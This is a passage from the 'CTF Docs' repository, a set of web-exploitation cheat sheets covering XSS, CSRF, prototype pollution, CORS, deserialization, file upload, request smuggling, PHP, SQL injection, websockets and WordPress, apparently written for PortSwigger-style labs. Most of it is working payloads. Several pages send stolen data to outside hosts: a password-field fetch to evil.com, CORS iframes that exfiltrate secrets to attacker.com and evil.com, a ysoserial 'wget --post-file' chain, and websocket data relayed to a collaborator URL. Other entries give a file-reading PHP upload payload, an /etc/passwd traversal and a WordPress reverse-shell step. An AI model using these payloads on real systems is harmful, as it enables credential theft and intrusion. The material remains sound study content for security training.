112 | <input type=password name=password onchange="if(this.value.length) fetch('https://evil.com',{method:'POST',mode: 'no-cors',body:username.value+':'+this.value});">
113 | ```
114 | 
115 | ### URL Reflection + Bind Key
116 | 
117 | `/?%27accesskey=%27x%27onclick=%27alert()`, then `Alt+x` on Brave
118 | 
119 | ### HTML entity escape
120 | 
121 | - `http://example&apos;,alert(),&apos;` => `('http://example',alert(),'...')'`
122 | 
123 | ### Change CSRF
124 | 
125 | ```html
126 | <script>
127 | let req = new XMLHttpRequest();
128 | req.onload = handleResponse;
129 | req.open('GET', '/my-account', true);
130 | req.send();
131 | 
132 | function handleResponse() {
133 |     let csrfToken = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
134 |     fetch("/my-account/change-email", {
135 |         "body": "email=toto@toto.com&csrf=" + csrfToken,
136 |         "method": "POST"
137 |     });
138 | };
139 | </script>
140 | ```
141 | 
142 | ### Escape 
143 | 
144 | `'` and `\`
145 | 
146 | ```html
147 | </script><script>alert()</script>
148 | ```
149 | 
150 | `'` with `<` filtered
151 | 
152 | ```html
153 | \';alert()//
154 | &apos;-alert(1)-&apos;
155 | ```
156 | 
157 | XSS inside backticks
158 | 
159 | ```html
160 | ${alert(document.domain)}
161 | ```


--------------------------------------------------------------------------------
/docs/web/clientside/04-prototype-pollution.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Prototype pollution
 3 | description: Prototype pollution cheatsheets.
 4 | ---
 5 | 
 6 | # Prototype pollution
 7 | 
 8 | ## Definition
 9 | 
10 | Prototype pollution is a type of vulnerability that occurs when an attacker is able to manipulate the prototype of an object in a JavaScript application. This can allow the attacker to add or modify properties on the object, which can have serious consequences for the security and functionality of the application.
11 | 
12 | In JavaScript, the prototype of an object is a property that specifies the object from which it inherits properties. When an object is created, it can inherit properties from its prototype, and these properties can be accessed and modified using the object's prototype property.
13 | 
14 | Prototype pollution occurs when an attacker is able to manipulate the prototype of an object in a way that allows them to add or modify properties on the object. This can be done using a variety of techniques, such as injecting malicious data into the application or using specially crafted payloads to exploit vulnerabilities in the application's code.
15 | 
16 | ## Attacks
17 | 
18 | - `https://example.com/?search=toto&__proto__[transport_url]=data:,alert(1)`
19 | - `https://example.com/?search=toto&__proto__.sequence='1')};alert()//`
20 | - Bypass non writable object using `Object.defineProperty()`'s `value` attribute : `https://example.com/?__proto__[value]=data:,alert(1)`
21 | - Bypass filter `https://example.com/?__pro__proto__to__[transport_url]=data:,alert()`
22 | 


--------------------------------------------------------------------------------
/docs/web/clientside/05-cors.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: CORS Misconfiguration 
 3 | description: Introduction to CORS Misconfiguration vulnerabilites.
 4 | ---
 5 | 
 6 | # CORS Misconfiguration
 7 | 
 8 | Most CORS attacks rely on the presence of the response header: `Access-Control-Allow-Credentials: true`.
 9 | 
10 | Without that header, the victim user's browser will refuse to send their cookies, meaning the attacker will only gain access to unauthenticated content, which they could just as easily access by browsing directly to the target website.
11 | 
12 | > References [portswigger.net](https://portswigger.net/web-security/cors).
13 | 
14 | Case :
15 | 
16 | 1. `Access-Control-Allow-Origin: *` : Allow everyone to fetch this ressource, it can be dangerous if the ressource is not intended to be public.
17 | 2. `Access-Control-Allow-Origin` always reflect the value of the `Origin` request header : Same as `1)`, there are no protections.
18 | 3. `Access-Control-Allow-Origin` is set to a specific domain or reflect the value of the `Origin` request header only on subdomains : Try to find XSS on this domains.
19 | 4. `Access-Control-Allow-Origin` is `null` if the `Origin` is `null` :
20 | 
21 | You cannot set the value of the `Origin` request header using `fetch` or `XHR` because this header is not "safe".
22 | However, this misconfiguration can still be exploited. Sandboxed elements (ex: `iframe`) sets the `Origin` header to `null` by default.
23 | 
24 | Example of exploit :
25 | 
26 | ```html
27 | <iframe sandbox="allow-scripts" src="data:text/html,
28 | <script>
29 | fetch('https://api.cors-null-vulnerable.com/sensitiveContent', {
30 |     credentials: 'include'
31 | })
32 | .then(response => response.json())
33 | .then(j => document.location=`https://attacker.com/exfiltration?key=${j['secret_key']}`);
34 | </script>
35 | "></iframe> 
36 | ```
37 | 
38 | ```html
39 | <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
40 |     var req = new XMLHttpRequest();
41 |     req.onload = reqListener;
42 |     req.open('get','https://example.com/accountDetails',true);
43 |     req.withCredentials = true;
44 |     req.send();
45 |     function reqListener() {
46 |         location='https://evil.com/log?key='+encodeURIComponent(this.responseText);
47 |     };
48 | </script>"></iframe>
49 | ```
50 | 
51 | HTTP Request headers :
52 | 
53 | ```
54 | GET /sensitiveContent HTTP/1.1
55 | Host: api.cors-null-vulnerable.com
56 | Cookie: session=agurne3nriezwaejpanrghq
57 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
58 | Accept: */*
59 | Accept-Language: en-US,en;q=0.5
60 | Accept-Encoding: gzip, deflate
61 | Origin: null
62 | [...]
63 | ```
64 | 
65 | HTTP response :
66 | 
67 | ```
68 | HTTP/1.1 200 OK
69 | Access-Control-Allow-Origin: null
70 | Access-Control-Allow-Credentials: true
71 | Content-Type: application/json; charset=utf-8
72 | Connection: close
73 | Content-Length: 149
74 | 
75 | {
76 |   "secret_key": "12345",
77 | }
78 | ```


--------------------------------------------------------------------------------
/docs/web/deserialization.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Insecure deserialization
 3 | description: Insecure deserialization cheatsheet
 4 | ---
 5 | 
 6 | # Insecure deserialization
 7 | 
 8 | ## Definition
 9 | 
10 | **Insecure deserialization** is a type of computer security vulnerability that occurs when untrusted data is used to deserialize (i.e., recreate) an object in a computer system. This can allow an attacker to execute arbitrary code and potentially compromise the security of the system.
11 | 
12 | ## Cheatsheet
13 | 
14 | - Java serialize : `0xACED` or `rO0` (base64)
15 | - Ruby serialize : `\x04\bo:\vUser`
16 | - Modify PHP attribute `O:4:"User":2:{s:8:"username";s:6:"carlos";s:7:"isAdmin";b:0;}` to `b:1`
17 | - Change data type for low comparaison bypass `0 == "Example string" // true`
18 | - Replace `avatar` path in your cookie and delete your account, the file will be delete
19 | - Add `index.php~` to find backup code source
20 | - Inject another PHP object with magic method (__destruct or __wakekup, ...)
21 | - `rm /home/carlos/morale.txt` using pre-built Apache Common gadget chain
22 | - Switch to JDK 11, `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 -w0 | copy`
23 | - PHPGGC - `./phpggc Symfony/RCE4 system 'rm /home/carlos/morale.txt'`
24 | - Ruby https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
25 | - `java -jar ysoserial-all.jar CommonsCollections6 'wget --post-file /home/carlos/secret 9hr1ibjg8nya8uzi0bfs85n4yv4mscg1.oastify.com' | gzip -f | base64 -w0 | copy`
26 | 
27 | ## References
28 | 
29 | - [PortSwigger - Insecure deserialization](https://portswigger.net/web-security/deserialization)
30 | 


--------------------------------------------------------------------------------
/docs/web/dom-clobbering.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: DOM Clobbering
 3 | description: DOM Clobbering cheatsheet
 4 | ---
 5 | 
 6 | ## Definition
 7 | 
 8 | **DOM Clobbering** is a type of attack that involves **overwriting the properties of a Document Object Model (DOM)** object in a web page with malicious code. This can allow an attacker to execute arbitrary JavaScript code in the victim's browser, potentially leading to the theft of sensitive information or other malicious activities. The term "clobbering" refers to the way in which the attacker overwrites the properties of the DOM object, effectively "clobbering" the original values with their own. DOM Clobbering attacks are often used in conjunction with cross-site scripting (XSS) attacks, and can be difficult to defend against. It is important for web developers to be aware of this type of attack and take steps to prevent it.
 9 | 
10 | ## Cheatsheet
11 | 
12 | ```html
13 | <div id="defaultAvatar"></div>
14 | <a id="defaultAvatar" name="avatar" href="cid:&quot;onerror=alert(1)//">
15 | ```
16 | 
17 | ```javascript
18 | window.defaultAvatar
19 | // HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]
20 | defaultAvatar
21 | // HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]
22 | 
23 | defaultAvatar.avatar
24 | // <a id="defaultAvatar" name="avatar" href="javascript:alert()"></a>
25 | defaultAvatar.avatar + ''
26 | // 'cid:"onerror=alert(1)//'
27 | ```
28 | 
29 | > `DOMPurify` allows you to use the `cid:` protocol, which does **not** URL-encode double-quotes.
30 | 
31 | ## References
32 | 
33 | - [PortSwigger - DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)


--------------------------------------------------------------------------------
/docs/web/file-upload.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Insecure file upload
 3 | description: Insecure file upload cheatsheet
 4 | ---
 5 | 
 6 | # Insecure File upload
 7 | 
 8 | ## Definition
 9 | 
10 | **Insecure file upload** refers to a vulnerability in a computer system that allows unauthorized users to upload files to the system. This can be a serious security risk because it can allow attackers to upload malicious files, such as viruses or malware, that can compromise the security of the system. To prevent insecure file uploads, it is important to implement appropriate security measures, such as file type restrictions and authentication checks, to ensure that only authorized users are able to upload files.
11 | 
12 | ## Cheathsheet
13 | 
14 | - Upload basic php file
15 | - Change PHP content type to `Content-Type: image/jpeg`
16 | - Path traversal in filename `../read_carlos_secret.php` or `..%2Fread_carlos_secret.php`
17 | - Bypass PHP file extension filter `php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, ...`
18 | - Other bypass `.pHp, .png.php`, `.php%00.png`, ...
19 | - Add PHP in image metadata : `exiftool -Comment='<?php echo "AAAA-"; echo file_get_contents("/home/carlos/secret"); echo "-BBBB"; ?>' toto.png.php`
20 | - Uploading files using PUT
21 | - Polyglot file [PHAR/JPEG generator](https://gitlab.com/xanhacks/phar-jpg-polyglot/)
22 | 
23 | ## References
24 | 
25 | - [PortSwigger - File upload](https://portswigger.net/web-security/file-upload)


--------------------------------------------------------------------------------
/docs/web/host-header-attack.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Host header attack
 3 | description: Host header attack cheatsheet
 4 | ---
 5 | 
 6 | # Host header attack
 7 | 
 8 | ## Definition
 9 | 
10 | A **Host header attack** is a type of cyber attack in which an attacker **manipulates the Host header of a request in order to trick a web server** into thinking the request is coming from a different website. This can allow the attacker to access resources or information that they would not normally have access to, or to perform actions on the targeted website that they would not normally be able to do. The Host header is a field in the HTTP request header that specifies the domain name of the website that the client is trying to access. By modifying this field, an attacker can direct the server to respond to their request as if it were coming from a different website.
11 | 
12 | ## Cheatsheet
13 | 
14 | - `Host: exploit-XXXX`
15 | - `X-Forwarded-Host: exploit-XXXXX`
16 | - `GET /admin` bypass with `Host: localhost`
17 | - Enum local networks : `Host: 192.168.0.67`, from 1 to 255
18 | - Absolute URL in path :
19 | 
20 | ```
21 | POST https://example.com/admin/delete HTTP/1.1
22 | Host: 192.168.0.15
23 | ...
24 | ```
25 | 
26 | - Submit double Host header (link $HOST/resource/toto.js, spoof host in cache)
27 | - Bypass host header check with `Connection: keep-alive`, [connection-state-attack](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack)
28 | 
29 | ## References
30 | 
31 | - [PortSwigger - HTTP Host header attacks](https://portswigger.net/web-security/host-header)


--------------------------------------------------------------------------------
/docs/web/php.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: PHP vulnerabilities
  3 | description: PHP vulnerabilities
  4 | ---
  5 | 
  6 | # PHP
  7 | 
  8 | ## PHP Wrappers
  9 | 
 10 | Official docs [here](https://www.php.net/manual/en/wrappers.php).
 11 | 
 12 | All wrappers :
 13 | 
 14 | ```
 15 | file:// — Accessing local filesystem
 16 | http:// — Accessing HTTP(s) URLs
 17 | ftp:// — Accessing FTP(s) URLs
 18 | php:// — Accessing various I/O streams
 19 | zlib:// — Compression Streams
 20 | data:// — Data (RFC 2397)
 21 | glob:// — Find pathnames matching pattern
 22 | phar:// — PHP Archive
 23 | ssh2:// — Secure Shell 2
 24 | rar:// — RAR
 25 | ogg:// — Audio streams
 26 | expect:// — Process Interaction Streams
 27 | ```
 28 | 
 29 | File inclusion :
 30 | 
 31 | ```
 32 | php://filter/resource=index.php
 33 | php://filter/read=convert.base64-encode/resource=index.php
 34 | php://filter/read=string.toupper/resource=index.php
 35 | php://filter/read=string.toupper|string.rot13/resource=index.php
 36 | ```
 37 | 
 38 | ## Type juggling
 39 | 
 40 | If you use `===`, PHP will do a strict comparison.
 41 | 
 42 | ```php
 43 | "1" == 1        True
 44 | "1" === 1       False
 45 | "admin" == 0    True
 46 | "admin" === 0   False
 47 | ```
 48 | 
 49 | You can find the comparison table [here](https://www.php.net/manual/en/types.comparisons.php).
 50 | 
 51 | ## Magic Hashes
 52 | 
 53 | You cand find a list of magic hashes [here](https://github.com/spaze/hashes).
 54 | 
 55 | ```php
 56 | md5('QLTHNDT') = 0e405967825401955372549139051580
 57 | 0e405967825401955372549139051580 = 0 exponents 405967825401955372549139051580 = 0
 58 | php > var_dump(md5('QLTHNDT') == "0");
 59 | bool(true)
 60 | ```
 61 | 
 62 | `0 power n` is equals to `0`.
 63 | 
 64 | ## Interesting function
 65 | 
 66 | **eval** code execution :
 67 | 
 68 | ```php
 69 | eval("phpinfo();");
 70 | ```
 71 | 
 72 | **preg_replace** code execution (removed since PHP v7.0.0)
 73 | 
 74 | ```php
 75 | preg_replace('/test/e', 'phpinfo()', 'test');
 76 | 
 77 | PREG_REPLACE_EVAL
 78 | ```
 79 | 
 80 | More informations [here](https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
 81 | 
 82 | **assert** without verification :
 83 | 
 84 | ```php
 85 | assert("strpos('includes/$_GET['name'].inc.php', '..') === false")
 86 | 
 87 | victim.com/index.php?name=', 'A') === false and strlen(file_get_contents('.passwd')) === 10 and strpos('
 88 | 
 89 | Will result as : assert("strpos('includes/', 'A') === false and strlen(file_get_contents('.passwd')) === 10 and strpos('.inc.php', '..') === false")
 90 | ```
 91 | 
 92 | **strcmp** array / null bypass :
 93 | 
 94 | ```php
 95 | php > var_dump(strcmp(Array(), "admin") == 0);
 96 | PHP Warning:  strcmp() expects parameter 1 to be string, array given in php shell code on line 1
 97 | bool(true)
 98 | 
 99 | Ex: strcmp($_GET['username'], 'admin') == 0
100 | victim.com/index.php?name[]=
101 | ```
102 | 
103 | ```php
104 | php > var_dump(strcmp(null, "admin") == True);
105 | bool(true)
106 | 
107 | php > var_dump(strcmp(null, "admin") === True);
108 | bool(false)
109 | ```
110 | 
111 | ## Tips
112 | 
113 | ### Null byte
114 | 
115 | Null Byte : %00 (PHP Version < 5.3.4)
116 | 
117 | `http://victim.com/index.php?file=../etc/passwd%00`
118 | 


--------------------------------------------------------------------------------
/docs/web/request-smuggling.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Request Smuggling
  3 | description: Request Smuggling cheatsheet
  4 | ---
  5 | 
  6 | # Request Smuggling
  7 | 
  8 | ## Definition
  9 | 
 10 | **Request smuggling** is a type of cyber attack that exploits vulnerabilities in the way that web servers and other network components handle incoming requests. This attack involves sending multiple requests to a web server or other network component in a way that is intended to bypass security measures or to **interfere with the normal processing of the requests**. The goal of this attack is to gain unauthorized access to sensitive information or to perform other malicious actions.
 11 | 
 12 | ## Potential impacts
 13 | 
 14 | - Capture request from other users
 15 | - Bypass frontend control
 16 | - Spread malicious response to users
 17 |     - XSS reflected
 18 |     - HTTP Redirection to vuln page
 19 | 
 20 | ## CL.TE
 21 | 
 22 | Check if the vuln exists by looking for 404 response :
 23 | 
 24 | ```
 25 | POST / HTTP/1.1
 26 | Host: 0a9000ba04ae672ec05a30930069004c.web-security-academy.net
 27 | Content-Type: application/x-www-form-urlencoded
 28 | Content-Length: 26
 29 | Transfer-Encoding: chunked
 30 | Connection: keep-alive
 31 | 
 32 | 0
 33 | 
 34 | GET /404 HTTP/1.1
 35 | X-Ignore:
 36 | ```
 37 | 
 38 | Reflected XSS via Smuggling :
 39 | 
 40 | ```
 41 | POST / HTTP/1.1
 42 | Host: 0ac100440421efb2c002ce00008700bc.web-security-academy.net
 43 | Content-Type: application/x-www-form-urlencoded
 44 | Content-Length: 150
 45 | Transfer-Encoding: chunked
 46 | 
 47 | 0
 48 | 
 49 | GET /post?postId=4 HTTP/1.1
 50 | Host: 0ac100440421efb2c002ce00008700bc.web-security-academy.net
 51 | User-Agent: M"><script>alert(1)</script>
 52 | X-Ignore:
 53 | ```
 54 | 
 55 | To bypass duplicates error problem, the rest of the request will be in the params :
 56 | 
 57 | ```
 58 | POST / HTTP/1.1
 59 | Host: 0a4000100459fd34c15c7dfe00be003a.web-security-academy.net
 60 | Content-Type: application/x-www-form-urlencoded
 61 | Content-Length: 139
 62 | Transfer-Encoding: chunked
 63 | 
 64 | 0
 65 | 
 66 | GET /admin/delete?username=carlos HTTP/1.1
 67 | host: localhost
 68 | Content-Type: application/x-www-form-urlencoded
 69 | Content-Length: 10
 70 | 
 71 | x=
 72 | ```
 73 | 
 74 | Exfiltrate data using reflected HTTP params :
 75 | 
 76 | ```
 77 | POST / HTTP/1.1
 78 | Host: vulnerable-website.com
 79 | Content-Length: 130
 80 | Transfer-Encoding: chunked
 81 | 
 82 | 0
 83 | 
 84 | POST /login HTTP/1.1
 85 | Host: vulnerable-website.com
 86 | Content-Type: application/x-www-form-urlencoded
 87 | Content-Length: 100
 88 | 
 89 | email=POST /login HTTP/1.1
 90 | Host: vulnerable-website.com
 91 | ...
 92 | ```
 93 | 
 94 | ## TE.CL
 95 | 
 96 | > Use extension HTTP Request Smuggling
 97 | 
 98 | ```
 99 | POST /search HTTP/1.1
100 | Host: vulnerable-website.com
101 | Content-Type: application/x-www-form-urlencoded
102 | Content-Length: 4
103 | Transfer-Encoding: chunked
104 | 
105 | 7c
106 | GET /404 HTTP/1.1
107 | Host: vulnerable-website.com
108 | Content-Type: application/x-www-form-urlencoded
109 | Content-Length: 144
110 | 
111 | x=
112 | 0
113 | ```
114 | 
115 | ## HTTP/2 Downgrading
116 | 
117 | > Create & modify HTTP/2 request using Inspector.
118 | > Shift + Enter to insert new line
119 | 
120 | Inject HOST based redirection response.
121 | 
122 | ```
123 | POST / HTTP/1.1
124 | Host: 0ae700f90344dd30c0a54a7100b70046.web-security-academy.net
125 | Content-Type: application/x-www-form-urlencoded
126 | Content-Length: 0
127 | 
128 | GET /resources HTTP/1.1
129 | Host: exploit-0a1500d60306ddd9c0be4a1d01ce00ad.exploit-server.net
130 | Content-Length: 15
131 | 
132 | x=1
133 | ```
134 | 
135 | CRLF in request header / HTTP request splitting, to capture others request (HTTP2 downgrading will add \r\n\r\n at the end of the request) :
136 | 
137 | ```
138 | HTTP2 REQUEST
139 | Foo: toto\r\n
140 | \r\n
141 | GET /x HTTP/1.1\r\n
142 | Host: 0a4600d80454afd4c0f201b000a200a4.web-security-academy.net
143 | ```
144 | 
145 | ## CL.0
146 | 
147 | Find endpoint that is not supposed to handle POST requests like static files.
148 | 
149 | Send in single connection :
150 | 
151 | ```
152 | POST /resources/images/avatarDefault.svg HTTP/1.1
153 | Host: 0a0600840320f8a1c184ace600510049.web-security-academy.net
154 | Content-Type: application/x-www-form-urlencoded
155 | Connection: keep-alive
156 | Content-Length: 100
157 | 
158 | GET /admin HTTP/1.1
159 | Foo: x
160 | ```
161 | 
162 | And another request on `GET /`, and voilà, you bypassed the frontend !
163 | 
164 | ## References
165 | 
166 | - [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)


--------------------------------------------------------------------------------
/docs/web/sql-injection.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: SQL Injection
 3 | description: SQL Injection cheatsheet
 4 | ---
 5 | 
 6 | # SQL Injection
 7 | 
 8 | ## Extract table and column names
 9 | 
10 | ### Oracle
11 | 
12 | ```sql
13 | SELECT LISTAGG(table_name, ',') FROM all_tables
14 | 
15 | SELECT LISTAGG(column_name, ',') FROM all_tab_columns
16 | WHERE table_name = 'TABLE-NAME-HERE'
17 | ```
18 | 
19 | ### Microsoft
20 | 
21 | ```sql
22 | SELECT STRING_AGG(table_name, CHAR(44)) FROM information_schema.tables
23 | 
24 | SELECT STRING_AGG(column_name, CHAR(44)) FROM information_schema.columns
25 | WHERE table_name = 'TABLE-NAME-HERE'
26 | ```
27 | 
28 | ### PostgreSQL
29 | 
30 | ```sql
31 | SELECT STRING_AGG(table_name, ',') FROM information_schema.tables
32 | 
33 | SELECT STRING_AGG(column_name, ',') FROM information_schema.columns
34 | WHERE table_name = 'TABLE-NAME-HERE'
35 | ```
36 | 
37 | ### MySQL
38 | 
39 | ```sql
40 | SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
41 | 
42 | SELECT GROUP_CONCAT(column_name) FROM information_schema.columns
43 | WHERE table_name = 'TABLE-NAME-HERE'`
44 | ```
45 | 
46 | 
47 | > References [portswigger.net - cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).
48 | 
49 | ## Privileges
50 | 
51 | ### MySQL
52 | 
53 | ```sql
54 | SHOW GRANTS;
55 | ```
56 | 
57 | ## Others
58 | 
59 | ### MySQL
60 | 
61 | Use `--vertical` to enable the vertical format or ending query with `\G`, example : `SELECT * FROM users \G`.
62 | 
63 | ```sql
64 | > SELECT * FROM city WHERE countrycode='AUT';
65 | *************************** 1. row ***************************
66 | 	ID: 1523
67 | 	Name: Wien
68 | 	CountryCode: AUT
69 | 	District: Wien
70 | 	Info: {"Population": 1608144}
71 | ```
72 | 
73 | > Source [dev.mysql.com](https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-output-vertical.html).
74 | 
75 | ### SQL Injection in Websockets
76 | 
77 | Example of command using SQLmap :
78 | 
79 | ```
80 | $ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"57636*"}'
81 | ```
82 | 
83 | Another way would be to use an HTTP server as proxy: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
84 | 


--------------------------------------------------------------------------------
/docs/web/websocket.md:
--------------------------------------------------------------------------------
 1 | # Websocket
 2 | 
 3 | ## Definition
 4 | 
 5 | A **WebSocket** is a protocol for bidirectional, full-duplex communication over a single TCP connection. It is a modern, efficient, and secure way for web applications to communicate with each other in real-time. With WebSockets, a web application can send and receive data in real-time without the need for continuous polling, which can reduce latency and improve performance. WebSockets are often used in applications such as online gaming, chat, and real-time data visualization.
 6 | 
 7 | ## Cheatsheet
 8 | 
 9 | - XSS in websocket
10 | - Exfil WS data
11 | 
12 | ```html
13 | <script>
14 |     var ws = new WebSocket('wss://your-websocket-url');
15 |     ws.onopen = function() {
16 |         ws.send("READY");
17 |     };
18 |     ws.onmessage = function(event) {
19 |         fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
20 |     };
21 | </script>
22 | ```
23 | 
24 | 
25 | ## References
26 | 
27 | - [PortSwigger - Websocket](https://portswigger.net/web-security/websockets/)


--------------------------------------------------------------------------------
/docs/web/wordpress.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Wordpress
 3 | description: Pentesting wordpress
 4 | ---
 5 | 
 6 | ## Authenticated RCE
 7 | 
 8 | From `/wp-admin`, click on `Appearance/Themes/Editor`.
 9 | 
10 | Then, replace the `404.php` page to your reverse shell (example of [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)).
11 | 
12 | Generic URL :
13 | 
14 | - `http://<HOST>/<WP_PATH>/wp-content/themes/<THEME>/404.php`
15 | 
16 | Example :
17 | 
18 | - `http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php`
19 | 
20 | ## Manually list plugins
21 | 
22 | ```bash
23 | $ feroxbuster -n -o wp_plugins.out -w wp_plugins.lst --url http://internal.thm/blog/wp-content/plugins/
24 | 
25 | $ feroxbuster -n -o wp_plugins.out -w wp_plugins.lst --url http://<HOST>/<WP_PATH>/wp-content/plugins/
26 | ```
27 | 
28 | Plugin list can be found, [here](https://github.com/Perfectdotexe/WordPress-Plugins-List/blob/master/plugins.txt).


--------------------------------------------------------------------------------
/mkdocs.yml:
--------------------------------------------------------------------------------
 1 | site_name: CTF Docs
 2 | theme:
 3 |   name: material
 4 |   favicon: assets/img/favicon.ico
 5 |   logo: assets/img/favicon.ico
 6 |   icon:
 7 |     repo: fontawesome/brands/gitlab
 8 |   features:
 9 |     - navigation.instant
10 |     - navigation.tabs
11 |     - navigation.top
12 |     - search.suggest
13 |     - search.highlight
14 |   palette:
15 |     - scheme: default
16 |       primary: black
17 |       accent: red
18 |       toggle:
19 |         icon: material/brightness-7 
20 |         name: Switch to dark mode
21 |     - scheme: slate
22 |       primary: black
23 |       accent: red
24 |       toggle:
25 |         icon: material/brightness-auto
26 |         name: Switch to light mode
27 | 
28 | repo_url: https://github.com/xanhacks/ctf-docs
29 | repo_name: xanhacks/ctf-docs
30 | 
31 | extra:
32 |   homepage: https://docs.xanhacks.xyz/
33 |   base_url: https://docs.xanhacks.xyz/
34 |   social:
35 |     - icon: fontawesome/brands/twitter
36 |       link: https://twitter.com/xanhacks
37 |     - icon: fontawesome/brands/gitlab
38 |       link: https://gitlab.com/xanhacks
39 |     - icon: fontawesome/solid/globe
40 |       link: https://xanhacks.xyz
41 | 
42 | 
43 | markdown_extensions:
44 |   - pymdownx.highlight
45 |   - pymdownx.superfences
46 |   - meta
47 |   - admonition
48 |   - def_list
49 |   - pymdownx.emoji:
50 |       emoji_index: !!python/name:materialx.emoji.twemoji
51 |       emoji_generator: !!python/name:materialx.emoji.to_svg
52 | 
53 | plugins:
54 |   - macros
55 |   - search
56 | 
57 | extra_javascript:
58 |   - https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js
59 |   - https://polyfill.io/v3/polyfill.min.js?features=es6
60 |   - https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js
61 |   - assets/js/config.js
62 |   - assets/js/mathjax.js
63 | extra_css:
64 |   - https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/styles/default.min.css
65 | 


--------------------------------------------------------------------------------